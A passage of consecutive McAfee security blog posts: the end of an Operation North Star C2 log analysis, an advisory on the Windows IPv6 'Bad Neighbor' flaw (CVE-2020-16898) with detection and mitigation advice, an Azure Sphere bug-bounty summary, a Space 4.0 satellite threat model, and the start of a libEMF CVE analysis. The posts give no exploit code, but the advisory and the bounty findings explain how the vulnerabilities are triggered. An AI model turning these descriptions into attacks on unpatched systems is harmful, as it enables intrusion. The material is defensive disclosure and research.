Some additional log file analysis reveals that a dotm file hosted with a. jpg extension was accessed by an Israeli IP address. This IP address likely belongs to a victim in Israel that executed the main DOCX. Based on the analysis of the user-agent string belonging to the Israel IP address Microsoft+Office+Existence+Discovery indicates that the dotm file in question was downloaded from within Microsoft Office (template injection).

Attacker Source

According to our analysis the attacker accessed and posted a malicious ASP script “template-letter.asp” from the IP address 104.194.220.87 on 7/9/2020.  Further research indicates that the attacker is originating from a service known as VPN Consumer in New York, NY.

Snipped from log file showing attacker IP 104.194.220.87

From the same logfiles, we observed the following User Agent String:

“Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+10.0;+Win64;+x64;+Trident/7.0;+.NET4.0C;+.NET4.0E;+ms-office;+MSOffice+16)”

Decoding the User Agent string we can make the following statement

The attacker is using a 64bit Windows 10 platform and Office 2016.

The Office version is the same as we observed in the creation of the Word-documents as described in our document analysis part of Operation NorthStar.

Conclusion

It is not very often that we have a chance of getting the C2 server code pages and associated logging in our possession for analysis. Where we started with our initial analysis of the first stage payloads, layer after layer we were able to decode and reveal, resulting in unique insights into this campaign.

Analysis of logfiles uncovered potential targets of which we were unaware following our first analysis of Operation North Star, including internet service providers and defense contractors based in Russia and India.

Our analysis reveals a previously unknown second stage implant known as Torisma which executes a custom shellcode, depending on specific victim profiles, to run custom actions. It also illustrates how the adversary used compromised domains in Italy and elsewhere, belonging to random organizations such as an auction house and printing company, to collect data on victim organizations in multiple countries during an operation that lasted nearly a year.

This campaign was interesting in that there was a particular list of targets of interest, and that list was verified before the decision was made to send a second implant, either 32 or 64 bits, for further and in-depth monitoring. Progress of the implants sent by the C2 was monitored and written in a log file that gave the adversary an overview of which victims were successfully infiltrated and could be monitored further.

Our findings ultimately provide a unique view into not only how the adversary executes his attacks but also how he evaluates and chooses to further exploit his victims.

Read our McAfee Defender’s blog to learn more about how you can build an adaptable security architecture against the Operation North Star campaign.

Special thanks to Philippe Laulheret for his assistance in analysis

 

[1] https://www.ecrypt.eu.org/stream/p2ciphers/vest/vest_p2.pdf

[2] https://www.ecrypt.eu.org/stream/vestp2.html

The post Operation North Star: Behind The Scenes appeared first on McAfee Blogs.

CVE-2020-16898: “Bad Neighbor”

By Steve Povolny

CVE-2020-16898: “Bad Neighbor”

CVSS Score: 8.8

Vector: CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C

Overview
Today, Microsoft announced a critical vulnerability in the Windows IPv6 stack, which allows an attacker to send maliciously crafted packets to potentially execute arbitrary code on a remote system. The proof-of-concept shared with MAPP (Microsoft Active Protection Program) members is both extremely simple and perfectly reliable. It results in an immediate BSOD (Blue Screen of Death), but more so, indicates the likelihood of exploitation for those who can manage to bypass Windows 10 and Windows Server 2019 mitigations. The effects of an exploit that would grant remote code execution would be widespread and highly impactful, as this type of bug could be made wormable. For ease of reference, we nicknamed the vulnerability “Bad Neighbor” because it is located within an ICMPv6 Neighbor Discovery “Protocol”, using the Router Advertisement type.

Vulnerability Details
A remote code execution vulnerability exists when the Windows TCP/IP stack improperly handles ICMPv6 Router Advertisement packets that use Option Type 25 (Recursive DNS Server Option) and a length field value that is even. In this Option, the length is counted in increments of 8 bytes, so an RDNSS option with a length of 3 should have a total length of 24 bytes. The option itself consists of five fields: Type, Length, Reserved, Lifetime, and Addresses of IPv6 Recursive DNS Servers. The first four fields always total 8 bytes, but the last field can contain a variable number of IPv6 addresses, which are 16 bytes each. As a result, the length field should always be an odd value of at least 3, per RFC 8106:

When an IPv6 host receives DNS options (i.e., RDNSS and DNSSL
options) through RA messages, it processes the options as follows:

   o  The validity of DNS options is checked with the Length field;
      that is, the value of the Length field in the RDNSS option is
      greater than or equal to the minimum value (3) and satisfies the
      requirement that (Length - 1) % 2 == 0.

When an even length value is provided, the Windows TCP/IP stack incorrectly advances the network buffer by an amount that is 8 bytes too few. This is because the stack internally counts in 16-byte increments, failing to account for the case where a non-RFC compliant length value is used. This mismatch results in the stack interpreting the last 8 bytes of the current option as the start of a second option, ultimately leading to a buffer overflow and potential RCE.

It is likely that a memory leak or information disclosure bug in the Windows kernel would be required in order to build a full exploit chain for this vulnerability. Despite this, we expect to see working exploits in the very near future.

Threat Surface
The largest impact here will be to consumers on Windows 10 machines, though with Windows Updates the threat surface is likely to be quickly minimized. While Shodan.io shouldn’t be counted on as a definitive source, our best queries put the number of Windows Server 2019 machines with IPv6 addresses is in the hundreds, not exceeding approximately 1000. This is likely because most servers are behind firewalls or hosted by Cloud Service Providers (CSPs) and not reachable directly via Shodan scans.

Detection
We believe this vulnerability can be detected with a simple heuristic that parses all incoming ICMPv6 traffic, looking for packets with an ICMPv6 Type field of 134 – indicating Router Advertisement – and an ICMPv6 Option field of 25 – indicating Recursive DNS Server (RDNSS). If this RDNSS option also has a length field value that is even, the heuristic would drop or flag the associated packet, as it is likely part of a “Bad Neighbor” exploit attempt.

Mitigation
Patching is always the first and most effective course of action. If this is not possible, the best mitigation is disabling IPv6, either on the NIC or at the perimeter of the network by dropping ICMPv6 traffic if it is non-essential. Additionally, ICMPv6 Router Advertisements can be blocked or dropped at the network perimeter. Windows Defender and Windows Firewall fail to block the proof-of-concept when enabled. It is unknown yet if this attack can succeed by tunneling the ICMPv6 traffic over IPv4 using technologies like 6to4 or Teredo. Our efforts to repeat the attack in this manner have not been successful to date.

For those McAfee customers who are unable to deploy the Windows patch, the following Network Security Platform (NSP) signatures will provide a virtual patch against attempted exploitation of this vulnerability, as well as a similar vulnerability (CVE-2020-16899). Unlike “Bad Neighbor”, the impact of CVE-2020-16899 is limited to denial-of-service in the form of BSoD.

NSP Attack ID: 0x40103a00 – ICMP: Windows IPv6 Stack Elevation of Privilege Vulnerability (CVE-2020-16898)
NSP Attack ID: 0x40103b00 – ICMP: Windows Function Discovery SSDP Provider Elevation of Privilege Vulnerability (CVE-2020-16899)

Additionally, we are releasing Suricata rules to detect potential exploitation of these vulnerabilities. Due to limitations in open source tools such as Snort and Suricata, we found that implementing the minimal detection logic described earlier required combining Suricata with its built-in Lua script parser. We have hosted the rules and Lua scripts at our public GitHub under CVE-2020-16898 and CVE-2020-16899 respectively. Although we have confirmed that the rules correctly detect use of the proof-of-concepts, they should be thoroughly vetted in your environment prior to deployment to avoid risk of any false positives.

The post CVE-2020-16898: “Bad Neighbor” appeared first on McAfee Blogs.

Our Experiences Participating in Microsoft’s Azure Sphere Bounty Program

By Philippe Laulheret

From June to August, part of the McAfee Advanced Threat Research (ATR) team participated in Microsoft’s Azure Sphere Research Challenge.  Our research resulted in reporting multiple vulnerabilities classified by Microsoft as “important” or “critical” in the platform that, to date, have qualified for over $160,000 USD in bounty awards scheduled to be contributed to the ACLU ($100,000), St. Jude’s Children’s Research Hospital ($50,000) and PDX Hackerspace (approximately $20,000). With these contributions, we hope to support and give back both to our local hacker community that has really stepped up to help during the COVID crisis, and also recognize, at a larger scale, the importance to protect and further civil liberties and the wellbeing of those most in need.  

This blog post is a highlevel overview of the program, why we choose to take part in it, and a brief description of our findings. A detailed technical walkthrough of our findings can be found here 

Additionally, Microsoft has released two summary blogs detailing the Azure Sphere Bounty Program as a whole, including McAfee’s efforts and findings. They can be found here:

MSRC Blog

Azure Sphere Core Team Blog

What is Azure Sphere and the Azure Sphere Research Challenge? 

In late May Microsoft started a new bug bounty program for its Azure Sphere platform. Azure Sphere is a hardened IoT device with a secure communication link to the cloud that has been in development for the last few years and reached general availability in early 2020. Microsoft designed and built it from scratch to ensure every aspect of it is as secure as possibleper their security model. To put the theory to test, Microsoft invited a few select partners and hackers to try their best to defeat its security measures.  

The Azure sphere team came up with multiple scenarios that would test the security model of the device and qualify for an increased payout from the regular Azure Bug Bounty program. These scenarios range from the ability to bypascertain security measures, to executing code in the hardware enabled secure core of the device.  

Research scenarios specific to the Azure Sphere Research Challenge 

Why did ATR get involved with the program? 

There are multiple reasons why we were keen to participate in this program. First, as security researchers, the Azure Sphere platform is an exciting new research target that has been built from the ground up with security in mind. It showcases what might become of the IoT space in the next few years as legacy platforms are slowly phased out. Being at the forefront of what is being done in the IoT space ensures our research remains current and we are ready to tackle future new challenges. Second, by finding critical bugs in this new platform we help make it more secure and offer our support to make the IoT space increasingly resistant to cyber threats. Finally, as this is a bug bounty program, we decided from the start that we would donate any award we received to charity, thus using our skills to contribute to the social good of our local communities and support causes that transcend the technology sector.   

Findings 

We’ve reported multiple bugs to Microsoft as a result of our research that were rated Important or Critical: 

  • Important – Security Feature bypass ($3,300): The inclusion of symlink in application package allows for referencing files outside of the application package mount point. 
  • Critical – RCE ($48,000): The inclusion of character device in an application package allows for direct interaction with a part of the flash memory, eventually leading to the modification of critical system files and further exploitation. 
  • Important – EoP ($11,000): Multiple bugs in how uid_map files are processed, allowing for elevation of privilege to the sys user.  
  • Important – Eop ($11,000): A user with sys privileges can trick Application Manager into unmounting “azcore” and mount a rogue binary in its stead. Triggering a core dump of a running process will then execute the rogue binary with full capabilities & root privileges due to improper handling of permissions in the LSM. 
  • Critical – EoP ($48,000): Further problems in the privilege dropping of azcore leads to the complete bypass of Azure Sphere capability restrictions 
  • Critical – EoP ($48,000): Due to improper certificate management, it is possible to re-claim a device on the Azure Sphere pre-prod server and obtain a valid capability file that works in the prod environment. This capability file can be used to re-enable application development mode on a finalized device (claimed by a third party). The deployment of the capability file requires physical access to a device.  

Conclusion 

This research was an exciting opportunity to look at new platform with very little prior research, while still being in the familiar territory of an ARM device running a hardened Linux operating-system 

Through the bugs we found we were able to get a full chain exploit from a locked device to having root access. However, the Azure Sphere platform has many more security features such as remote attestation, and a hardware enabled secure core that is still holding strong.  

Finally, we want to thank Microsoft for the opportunity of participating in this exciting program, and the bounty awards 

The post Our Experiences Participating in Microsoft’s Azure Sphere Bounty Program appeared first on McAfee Blogs.

Securing Space 4.0 – One Small Step or a Giant Leap? Part 2

By Eoin Carroll

McAfee Advanced Threat Research (ATR) is collaborating with Cork Institute of Technology (CIT) and its Blackrock Castle Observatory (BCO) and the National Space Center in Cork, Ireland

In the first of this two-part blog series we introduced Space 4.0, its data value and how it looks set to become the next battleground in the defense against cybercriminals. In part two we discuss the architectural components of Space 4.0 to threat model the ecosystem from a cybersecurity perspective and understand what we must do to secure Space 4.0 moving forward.

Nanosats: Remote Computers in Space

A satellite is composed of a payload and a bus. The payload is the hardware and software required for the mission or satellite’s specific function, such as imaging equipment for surveillance. The bus consists of the infrastructure or platform that houses the payload, such as thermal regulation and command and control. Small satellites are space craft typically weighing less than 180 kilograms and, within that class of satellites, is what we call nanosatellites or nanosats which typically weigh between 1-10 kilograms. Cubesats are a class of nanosat so you will often hear the term used interchangeably, and for the context of Space 4.0 security, we can assume they are the same device. Nanosats significantly reduce launch costs due to their small size and the fact that many of these devices can be mounted on board a larger single satellite for launch.

Commercial off-the-shelf (COTS) Cubesats typically use free open source software such as FreeRTOS or KubOS for the on-board operating system. However, other systems are possible, with drivers available for most of the hardware on Linux and Windows OS. KubOS is an open source flight software framework for satellites and has cloud-based mission control software, Major Tom, to operate nanosats or a constellation. We mention KubOS here as it is a good example of what the current Space 4.0 operating model looks like today. While we have not reviewed KubOS from a security perspective, developing a secure framework for satellites is the right path forward, allowing mission developers to focus on the payload.

Some of the use cases available with Cubesats are:

  1. File transfers
  2. Remote communication via uplink/downlink
  3. Intra-satellite and inter-satellite communications
  4. Payload services such as camera and sensors telemetry
  5. Software Updates

KubOS is “creating a world where you can operate your small satellite from your web browser or iPhone”. KubOSobjective is to allow customers to send bits and not rockets to space and it is defining a new era of software-designed satellites. The satellite model is changing from relay type devices to remote computers in space using COTS components and leveraging TCP/IP routing capabilities. This model shift also means that there is more software executing on these satellites and more complex payload processing or interaction with the software stack and hence more attack surface.

To date, attacks on satellite systems from a cybersecurity perspective have typically been in the context of VSAT terminals, eavesdropping and hijacking. While there have been vulnerabilities found in the VSAT terminal software and its higher-level custom protocols, there seems to have been no focus and vulnerabilities discovered within the network software stack of the satellite itself. This may be since satellites are very expensive, as well as closed source, so not accessible to security researchers or cybercriminals, but this security by obscurity will not provide protection with the new era of nanosats. Nanosats use COTS components which will be accessible to cybercriminals.

Due to the closed nature of satellites there has not been much published on their system hardware and software stack. However, the Consultative Committee for Space Data Systems (CCSDS), which develops standards and specifications including protocols for satellite communications, does give some insight. The CCSDS technical domains are:

  1. Space Internetworking Services
  2. Mission Ops. And Information Management Services
  3. Spacecraft Onboard Interface Services
  4. System Engineering
  5. Cross Support Services
  6. Space Link Services

The CCSDS standards are divided into color codes to represent recommended standards and practices versus informational and experimental. This is a very large source of data communications for satellite designers to aid them in a reference for implementation. However, as we have observed over the cyber threat landscape of the past few decades, secure standards and specifications for hardware, software and protocols do not always translate to secure implementation. The CCSDS defines a TCP/IP stack suitable for transmission over space datalinks as per figure 1 below. Satellites that become more connected, just like any other device on the internet, their network and protocol software stack will become more accessible and targeted. As we discussed in part 1 <insert link> of our Space 4.0 blog series, there have been many TCP/IP and remote protocol related vulnerabilities in both embedded devices and even state of the art operating systems such as Windows 10. The TCP/IP stack and remote protocol implementations are a common source of vulnerabilities due to the complexities of parsing in unsafe memory languages such as C and C++. There does not appear to be any open source implementations of the CCSDS TCP/IP protocol stack.

Figure 1 – CCSDS Space communications protocols reference model

The CubeSat Protocol (CSP) is a free open source TCP/IP stack implementation for communication over space datalinks, similar to the CCSDS TCP/IP stack. The CSP protocol library is implemented in C, open source and implemented in many Cubesats that have been deployed to space. The protocol can be used for communication from ground station to satellite, inter-satellite and the intra-satellite communication bus. There have been 3 vulnerabilities to date reported in this protocol.

Figure 2 below shows what a Cubesat architecture looks like from a trust boundary perspective relative to the satellite and other satellites within the constellation and the earth.

Figure 2 – Space LEO Cubesat architecture trust boundaries

No hardware, software, operating system or protocol is completely free of vulnerabilities. What is important from a security perspective is:

  1. The accessibility of the attack surface
  2. The motives and capabilities of the adversary to exploit an exposed vulnerability if present in the attack surface

As these low-cost satellites get launched in our LEO and become more connected, any exposed technology stack will become increasingly targeted by cybercriminals.

Space 4.0 Threat Modeling

This Space 4.0 threat model focuses on the cybercriminal and how they can exploit Space 4.0 data for monetization. The following Space 4.0 factors will make it more accessible to cybercriminals:

  1. Mass deployment of small satellites to LEO
  2. Cheaper satellites with COTS components and increased satellite on board software processing (no longer relay devices)
  3. Satellite service models, Ground Station-as-a-Service (GSaaS) and Satellite-as-a-Service (SataaS) and shared infrastructure across government, commercial and academic
  4. Satellite connectivity and networks in space (ISL – inter-satellite links)
  5. Space 4.0 data value

Space security has typically been analyzed from the perspective of ground segment, communications or datalink and space segment. Additionally, the attack classes have been categorized as electronic (jamming), eavesdropping, hijacking and control. Per figure 3 below, we need to think about Space 4.0 with a cybersecurity approach due to the increased connectivity and data, as opposed to the traditional approach of ground, communication and space segments. Cybercriminals will target the data and systems as opposed to the RF transmission layer.

Figure 3 – Space 4.0 threat modeling architecture

It is important to consider the whole interconnectivity of the Space 4.0 ecosystem as cybercriminals will exploit any means possible, whether that be direct or indirect access (another trusted component). Open source networked ground stations such as SatNOGs and the emerging NyanSat are great initiatives for space research but we should consider these in our overall threat model as they provide mass connectivity to the internet and space.

The traditional space security model has been built on a foundation of cost as a barrier to entry and perimeter-based security due to lack of physical access and limited remote access to satellites. However, once a device is connected to the internet the threat model changes and we need to think about a satellite as any other device which can be accessed either directly or indirectly over the internet.

In addition, if a device can be compromised in space remotely or through the supply chain, then that opens a new attack class of space to cloud/ground attacks.

Users and trusted insiders will always remain a big threat from a ground station perspective, just like enterprise security today, as they can potentially get direct access to the satellite control.

The movement of ground services to the cloud is a good business model if designed and implemented securely, however a compromise would impact many devices in space being controlled from the GSaaS. It is not quite clear where the shared responsibility starts and ends for the new SataaS and GSaaS Space 4.0 service models but the satellite key management system (KMS), data, GSaaS credentials and analytics intellectual property (this may reside in the user’s environment, the cloud or potentially the satellite but for the purposes of this threat model we assume the cloud) will be much valued assets and targeted.

From the Cyber and Space Threat Landscape review in part 1 <insert link>, combined with our understanding of the Space 4.0 architecture and attack surfaces, we can start to model the threats in Table 1 below.

Table 1 – Space 4.0 threats, attack classes and layers, and attack vectors

Based on the above threat model, let’s discuss a real credible threat and attack scenario. From our Space cyber threat landscape review in part 1 of this blog series, there were attacks on ground stations in 2008 at the Johnson Space Center and for a Nasa research satellite. In a Space 4.0 scenario, the cybercriminal attacks the ground station through phishing to get access to satellite communications (could also be a supply chain attack to get a known vulnerable satellite system into space). The cybercriminal uses an exploit being sold on the underground to exploit a remote wormable vulnerability within the space TCP/IP stack or operating system of the satellite in space, just like we saw EternalBlue being weaponized by WannaCry. Once the satellite has been compromised the malware can spread between satellite vendors using their ISL communication protocol to propagate throughout the constellation. Once the constellation has been compromised the satellite vendor can be held to ransom, causing major disruption to Space 4.0 data and/or critical infrastructure.

Moving Forward Securely for a Trustworthy Space 4.0 Ecosystem

Establishing a trustworthy Space 4.0 ecosystem is going to require strong collaboration between cyber threat research teams, government, commercial and academia in the following areas:

  1. Governance and regulation of security standards implementation and certification/validation of satellite device security capabilities prior to launch
  2. Modeling the evolving threat landscape against the Space 4.0 technology advancements
  3. Secure reference architectures for end to end Space 4.0 ecosystem and data protection
  4. Security analysis of the CCSDS protocols
  5. Design of trustworthy platform primitives to thwart current and future threats must start with a security capable bill of materials (BOM) for both hardware and software starting with the processor then the operating system, frameworks, libraries and languages. Hardware enabled security to achieve confidentiality, integrity, availability and identity so that satellite devices may be resilient when under attack
  6. Visibility, detection and response capabilities within each layer defined in our Space 4.0 architecture threat model above
  7. Development of a MITRE ATT&CK specifically for Space 4.0 as we observe real world incidents so that it can be used to strengthen the overall defensive security architecture using TTPs and threat emulation

Space 4.0 is moving very fast with GSaaS, SataaS and talk of space data centers and high-speed laser ISL; security should not be an inhibitor for time to market but a contributor to ensure that we have a strong security foundation to innovate and build future technology on with respect to the evolving threat landscape. Space communication predates the Internet so we must make sure any legacy limitations which would restrict this secure foundation are addressed. As software complexity for on board processing and connectivity/routing capability increases by moving to the edge (space device) we will see vulnerabilities within the Space 4.0 TCP/IP stack implementation.

This is a pivotal time for the secure advancement of Space 4.0 and we must learn from the mistakes of the past with IoT where the rush to adopt new and faster technology resulted in large scale deployment of insecure hardware and software. It has taken much effort and collaboration between Microsoft and the security research community since Bill Gates announced the Trustworthy Computing initiative in 2002 to arrive at the state-of-the-art Windows 10 OS with hardware enabled security. Likewise, we have seen great advancements on the IoT side with ARM Platform Security Architecture and Azure Sphere. Many security working groups and bodies have evolved since 2002, such as the Trust Computing Group, Confidential Computing Consortium, Trusted Connectivity Alliance and Zero Trust concept to name a few. There are many trustworthy building block primitives today to help secure Space 4.0, but we must leverage at the concept phase of innovation and not once a device has been launched into space; the time is now to secure our next generation infrastructure and data source. Space security has not been a priority for governments to date but that seems all set to change with the “Memorandum on Space Policy Directive-5—Cybersecurity Principles for Space Systems”.

We should pause here for a moment and recognize the recent efforts from the cybersecurity community to secure space, such as the Orbital Security Alliance, S-ISAC, Mantech and Defcon Hack-a-Sat.

KubOS is being branded as the Android of space systems and we are likely to see a myriad of new software and hardware emerge for Space 4.0. We must work together to ensure Space 4.0 connectivity does not open our global connectivity and infrastructure dependency to the next Mirai botnet or WannaCry worm on LEO.

McAfee would like to thank Cork Institute of Technology (CIT) and its Blackrock Castle Observatory (BCO) and the National Space Center (NSC) in Cork, Ireland for their collaboration in our mission to secure Space 4.0.

The post Securing Space 4.0 – One Small Step or a Giant Leap? Part 2 appeared first on McAfee Blogs.

Securing Space 4.0 – One Small Step or a Giant Leap? Part 1

By Eoin Carroll

McAfee Advanced Threat Research (ATR) is collaborating with Cork Institute of Technology (CIT) and its Blackrock Castle Observatory (BCO) and the National Space Center (NSC) in Cork, Ireland

The essence of Space 4.0 is the introduction of smaller, cheaper, faster-to-the-market satellites in low-earth-orbit into the value chain and the exploitation of the data they provide. Space research and communication prior to Space 4.0 was primarily focused on astronomy and limited to that of governments and large space agencies. As technology and society evolves to consume the “New Big Data” from space, Space 4.0 looks set to become the next battleground in the defense against cybercriminals. Space 4.0 data can range from earth observation sensing to location tracking information and applied across many vertical uses cases discussed later in this blog. In the era of Space 4.0 the evolution of the space sector is rapidly changing with a lower cost of launching, combined with public and private partnerships that open a whole new dimension of connectivity. We are already struggling to secure our data on earth, we must now understand and secure how our data will travel through space constellations and be stored in cloud data centers on earth and in space.

Low Earth Orbit (LEO) satellites are popular for scientific usage but how secure are they? The Internet of Things (IoT) introduced a myriad of insecure devices onto the Internet due to the low cost of processors and high-speed connectivity, but the speed in its adoption resulted in a large fragmentation of insecure hardware and software across business verticals.

Space 4.0 is now on course for a similar rapid adoption with nanosats as we prepare to see a mass deployment of cheap satellites into LEO. These small satellites are being used across government, academic and commercial sectors for different use cases that require complex payloads and processing. Many nanosats can coexist on a single satellite. This means that the same satellite backbone circuit infrastructure can be shared, reducing build and launch costs and making space data more accessible.

To date, satellites have typically been relay type devices repeating signals to and from different locations on earth in regions with poor internet connectivity, but that is all set to change with a mass deployment of smarter satellite devices using inter-satellite links (ISL) in  constellations like Starlink which aim to provide full high speed broadband global coverage. As the Space 4.0 sector is moving from private and government sectors to general availability, this makes satellites more accessible from a cost perspective, which will attract threat actors other than nation states, such as cyber criminals. Space 4.0 also brings with it new service delivery models such as Ground Station as a Service (GSaaS) with AWS and Azure Orbital and Satellite as a Service (SataaS). With the introduction of these, the satellite will become another device connecting to the cloud.

In our research we analyze the ecosystem to understand the latest developments and threats in relation to cybersecurity in space and whether we are ready to embrace Space 4.0 securely.

Space 4.0 Evolution

What is the Industrial 4th Revolution? The original industrial revolution started with the invention of steam engines then electricity, computers and communication technology. Industry 4.0 is about creating a diverse, safe, healthy, just world with clean air, water, soil and energy, as well as finding a way to pave the path for the innovations of tomorrow.

The first space era, or Space 1.0, was the study of astronomy, followed by the Apollo moon landings and then the inception of the International Space Station (ISS). Space 4.0  is analogous to Industry 4.0, which is considered as the unfolding fourth industrial revolution of manufacturing and services. Traditionally, access to space has been the domain of governments and large space agencies (such as NASA or the European Space Agency) due to the large costs involved in the development, deployment and operation of satellites. In recent years, a new approach to using space for commercial, economic and societal good has been driven by private enterprises in what is termed New Space. When combined with the more traditional approach to space activity, the term “Space 4.0” is used. Space 4.0 is applicable across a wide range of vertical domains, including but not limited to:

  • Ubiquitous broadband
  • Autonomous vehicles
  • Earth observation
  • Disaster mitigation/relief
  • Human spaceflight
  • Exploration

Cyber Threat Landscape Review

The Cyber Threat Landscape has evolved greatly over the past 20 years with the convergence of Information Technology (IT), Operational Technology (OT) and IoT. Protecting consumers, enterprises and critical infrastructure with the rapid parallel innovation of technology and cybercriminals is a constant challenge. While technology and attacks evolve rapidly the cybercriminal motive remains a constant; make money and maximize profit by exploiting a combination of users and technology.

Cybercriminals have much more capabilities now than they did 10 years ago due to the rise of Cybercrime as a Service (CaaS). Once an exploit for a vulnerability has been developed, it can then be weaponized into an exploit kit or ransomware worm, such as WannaCry. Cybercriminals will follow the path of least resistance to achieve their goal of making money.

Nearly every device class across the business verticals, ranging from medical devices to space Very-small-aperture terminals (VSAT), have been hacked by security researchers, as evident from Blackhat and Defcon trends.

From a technology stack perspective (hardware and software) there have been vulnerabilities discovered and exploits developed across all layers where we seek to establish some form of trustworthiness when connected to the internet; browsers, operating systems, protocols, hypervisors, enclaves, cryptographic implementations, system on chips (SoC) and processors.

Not all these vulnerabilities and exploits become weaponized by cybercriminals, but it does highlight the fact that the potential exists. Some notable weaponized exploits are:

  1. Stuxnet worm
  2. WannaCry ransomware worm
  3. Triton malware
  4. Mirai Botnet

Some recent major industry vulnerabilities were: BlueKeep (Windows RDP Protocol), SMBGhost (Windows SMB Protocol), Ripple20 (Treck embedded TCP/IP library), Urgent 11 (VxWorks TCP/IP library), Heartbleed (OpenSSL library), Cloudbleed (Cloudflare), Curveball (Microsoft Crypto API), Meltdown and Spectre (Processor side channels).

Cybercriminals will adapt quickly to maximize their profit as we saw with the COVID-19 pandemic and the mass remote workforce. They will quickly understand the operating environment changes and how they can reach their goals by exploiting users and technology, whichever is the weakest link. The easiest entry point into an organization will be through identity theft or weak passwords being used in remote access protocols such as RDP.

Cybercriminals moved to the Dark Web to hide identity and physical location of servers or using bullet-proof providers to host their infrastructure. What if these services are hosted in space? Who is the legal entity and who is responsible?

McAfee Enterprise Supernova Cloud analysis reports that:

  • Nearly one in 10 files shared in the cloud with sensitive data have public access, an increase of 111% year over year
  • One in four companies have had their sensitive data downloaded from the cloud to an unmanaged personal device, where they cannot see or control what happens to the data
  • 91% of cloud services do not encrypt data at rest
  • Less than 1% of cloud services allow encryption with customer-managed keys

The transition to the cloud, when done securely, is the right business decision. However, when not done securely it can leave your services and data/data lakes accessible to the public through misconfigurations (shared responsibility model), insecure APIs, and identity and access management issues. Attackers will always go for the low hanging fruit such as open AWS buckets and credentials through vendors in the supply chain.

One of the key initiatives, and now industry benchmark, is the MITRE ATT&CK framework which enumerates the TTPs from real word incidents across Enterprise (Endpoint and Cloud), Mobile and ICS. This framework has proved to be very valuable in enabling organizations to understand adversary TTPs and the corresponding protect, detect and response controls required in their overall defense security architecture. We may well see a version of MITRE ATT&CK evolve for Space 4.0.

Space Cyber Threat Landscape Review

Threat actors know no boundaries as we have seen criminals move from traditional crime to cybercrime using whatever means necessary to make money. Likewise, technology communication traverses many boundaries across land, air, sea and space. With the reduced costs to entry and the commercial opportunities with Space 4.0 big data, we expect to see cybercriminals innovating within this huge growth area. The Cyber Threat Landscape can be divided into vulnerabilities discovered by security researchers and actual attacks reported in the wild. This allows us to understand the technologies within the space ecosystem that are known to contain vulnerabilities and what capabilities threat actors have and are using in the wild.

Vulnerabilities discovered to date have been within VSAT terminal systems and intercepting communications. There have been no vulnerabilities disclosed on actual satellites from figure 1 below.

Figure 1 – Security Researcher space vulnerability disclosures

To date, satellites have mostly been controlled by governments and the military so little information is available as to whether an actual satellite has been hacked. We do expect to see that change with Space 4.0 as these satellites will be more accessible from a hardware and software perspective to do security analysis. Figure 2 below highlights reported attacks in the wild

Figure 2 – Reported Attacks in the Wild

In McAfee’s recent threat research, “Operation North Star”, we observed an increase in malicious cyber activity targeting the Aerospace and Defense industry. The objective of these campaigns was to gather information on specific programs and technologies.

Since the introduction of the cloud, it appears everything has become a device that interacts with a service. Even cybercriminals have been adapting to the service model. Space 4.0 is no different as we start to see the adoption of the Ground Station as a Service (GSaaS) and Satellite as a Service (SataaS) models per figure 3 below. These services are opening in the space sector due to the acceleration of vendors into Space 4.0 to help keep their costs down. Like any new ecosystem this will bring new attack surfaces and challenges which we will discuss in the Threat Modelling section.

Figure 3 – New Devices and Services for Space 4.0


So, with the introduction of cheap satellites using commercial off-the-shelf (COTS) components and new cloud services is it just a matter of time before we see mass satellite attacks and compromise?

Space 4.0 Data Value

The global space industry grew at an average rate of 6.7% per year between 2005 and 2017 and is projected to rise from its current value of $350 billion to $1.3 trillion per annum by 2030. This rise is driven by new technologies and business models which have increased the number of stakeholders and the application domains which they service in a cost-effective way. The associated increase in data volume and complexity has, among other developments, resulted in increasing concerns over the security and integrity of data transfer and storage between satellites, and between ground stations and satellites.

The McAfee Supernova report shows that data is exploding out of enterprises and into the cloud. We are now going to see the same explosion from Space 4.0 to the cloud as vendors race to innovate and monetize data from low cost satellites in LEO.

According to Microsoft the processing of data collected from space at cloud-scale to observe the Earth will be “instrumental in helping address global challenges such as climate change and furthering of scientific discovery and innovation”. The value of data from space must be viewed from the perspective of the public and private vendors who produce and consume such data. Now that satellite launch costs have reduced, producing this data becomes more accessible to commercial markets, so we are going to see much innovation in data analytics to improve our lives, safety and preservation of the earth. This data can be used to improve emergency response times to save lives, monitoring illegal trafficking, aviation tracking blind spots, government scientific research, academic research, improving supply chains and monitoring the earth’s evolution, such as climate change effects. Depending on the use case, this data may need to be confidential, may have privacy implications when tracking and may have substantial value in the context of new markets, innovation and state level research. It is very clear that data from space will have much value as new markets evolve, and cybercriminals will most certainly target that data with the intent to hold organizations to ransom or sell data/analytics innovation to competitors to avoid launch costs. Whatever the use case and value of the data traveling through space may be, we need to ensure that it moves securely by providing a trustworthy end to end ecosystem.

As we progress towards the sixth digital era, our society, lives and connectivity will become very dependent on off-planet data and technology in space, starting with SataaS.

In Part 2 we will discuss remote computers in Space, the Space 4.0 threat model and what we must do to secure Space 4.0 moving forward.

McAfee would like to thank Cork Institute of Technology (CIT) and their Blackrock Castle Observatory (BCO) and the National Space Center (NSC) in Cork, Ireland for their collaboration in our mission to securing Space 4.0.

The post Securing Space 4.0 – One Small Step or a Giant Leap? Part 1 appeared first on McAfee Blogs.

Vulnerability Discovery in Open Source Libraries: Analyzing CVE-2020-11863

By Chintan Shah

Open Source projects are the building blocks of any software development process. As we indicated in our previous blog, as more and more products use open source code, the increase in the overall attack surface is inevitable, especially when open source code is not audited before use. Hence it is recommended to thoroughly test it for potential vulnerabilities and collaborate with developers to fix them, eventually mitigating the attacks. We also indicated that we were researching graphics libraries in Windows and Linux, reporting multiple vulnerabilities in Windows GDI as well as Linux vector graphics library libEMF. We are still auditing many other Linux graphics libraries since these are legacy code and have not been strictly tested before.

In part 1 of this blog series, we described in detail the significance of open source research, by outlining the vulnerabilities we reported in the libEMF library. We also highlighted the importance of compiling the code with memory sanitizers and how it can help detect a variety of memory corruption bugs. In summary, the Address Sanitizer (ASAN) intercepts the memory allocation / deallocation functions like malloc () / free() and fills out the memory with the respective fill bytes (malloc_fill_byte / free_fill_byte). It also monitors the read and write to these memory locations, helping detect erroneous access during run time.

In this blog, we provide a more detailed analysis for one of the reported vulnerabilities, CVE-2020-11863, which was due to the use of uninitialized memory. This vulnerability is related to CVE-2020-11865, a global object vector out of bounds memory access in the GlobalObject::Find() function in libEMF. However, the crash call stack turned out to be different, which is why we decided to examine this further and produce this deep dive blog.

